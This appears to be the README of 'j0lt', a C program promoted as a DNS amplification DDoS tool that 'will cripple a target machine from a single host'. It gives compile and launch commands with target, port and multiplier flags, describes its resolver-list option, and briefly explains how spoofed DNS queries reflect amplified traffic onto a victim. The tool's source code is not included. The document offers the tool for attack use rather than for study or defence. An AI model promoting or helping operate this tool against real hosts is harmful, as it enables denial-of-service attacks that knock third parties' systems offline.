j0lt.c DNS amplification (DDoS) attack tool
Use with extreme caution
Brutally effective DNS amplification ddos attack tool, will cripple a target machine from a single host.
- Usage: sudo ./j0lt -t -p -m
- (the-scientist㉿rs)-$ gcc j0lt.c -o j0lt
- (the-scientist㉿rs)-$ sudo ./j0lt -t 127.0.0.1 -p 80 -m 1337
- [-x] will print a hexdump of the packet headers
- [-d] puts j0lt into debug mode, no packets are sent
- [-r list] will not fetch a resolv list, if one is provided.
What is DNS a amplification attack:
- A type of DDoS attack in which attackers use publicly accessible open DNS servers to flood a target with DNS response traffic. An attacker sends a DNS lookup request to an open DNS server with the source address spoofed to be the target’s address. When the DNS server sends the
record response, it is sent to the target instead.